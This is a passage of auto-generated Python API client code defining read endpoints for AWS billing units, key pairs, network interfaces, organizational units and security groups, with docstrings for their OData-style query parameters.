apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsBillingUnitResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_billing_unit_list = _Endpoint(
settings={
'response_type': (CloudAwsBillingUnitResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsBillingUnits',
'operation_id': 'get_cloud_aws_billing_unit_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_billing_unit_list
)
def __get_cloud_aws_key_pair_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.AwsKeyPair' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_key_pair_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsKeyPair
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_key_pair_by_moid = _Endpoint(
settings={
'response_type': (CloudAwsKeyPair,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsKeyPairs/{Moid}',
'operation_id': 'get_cloud_aws_key_pair_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_key_pair_by_moid
)
def __get_cloud_aws_key_pair_list(
self,
**kwargs
):
"""Read a 'cloud.AwsKeyPair' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_key_pair_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsKeyPairResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_key_pair_list = _Endpoint(
settings={
'response_type': (CloudAwsKeyPairResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsKeyPairs',
'operation_id': 'get_cloud_aws_key_pair_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_key_pair_list
)
def __get_cloud_aws_network_interface_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.AwsNetworkInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_network_interface_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsNetworkInterface
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_network_interface_by_moid = _Endpoint(
settings={
'response_type': (CloudAwsNetworkInterface,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsNetworkInterfaces/{Moid}',
'operation_id': 'get_cloud_aws_network_interface_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_network_interface_by_moid
)
def __get_cloud_aws_network_interface_list(
self,
**kwargs
):
"""Read a 'cloud.AwsNetworkInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_network_interface_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsNetworkInterfaceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_network_interface_list = _Endpoint(
settings={
'response_type': (CloudAwsNetworkInterfaceResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsNetworkInterfaces',
'operation_id': 'get_cloud_aws_network_interface_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_network_interface_list
)
def __get_cloud_aws_organizational_unit_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.AwsOrganizationalUnit' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_organizational_unit_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsOrganizationalUnit
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_organizational_unit_by_moid = _Endpoint(
settings={
'response_type': (CloudAwsOrganizationalUnit,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsOrganizationalUnits/{Moid}',
'operation_id': 'get_cloud_aws_organizational_unit_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_organizational_unit_by_moid
)
def __get_cloud_aws_organizational_unit_list(
self,
**kwargs
):
"""Read a 'cloud.AwsOrganizationalUnit' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_organizational_unit_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsOrganizationalUnitResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_organizational_unit_list = _Endpoint(
settings={
'response_type': (CloudAwsOrganizationalUnitResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsOrganizationalUnits',
'operation_id': 'get_cloud_aws_organizational_unit_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_organizational_unit_list
)
def __get_cloud_aws_security_group_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.AwsSecurityGroup' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_security_group_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsSecurityGroup
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_aws_security_group_by_moid = _Endpoint(
settings={
'response_type': (CloudAwsSecurityGroup,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsSecurityGroups/{Moid}',
'operation_id': 'get_cloud_aws_security_group_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_security_group_by_moid
)
def __get_cloud_aws_security_group_list(
self,
**kwargs
):
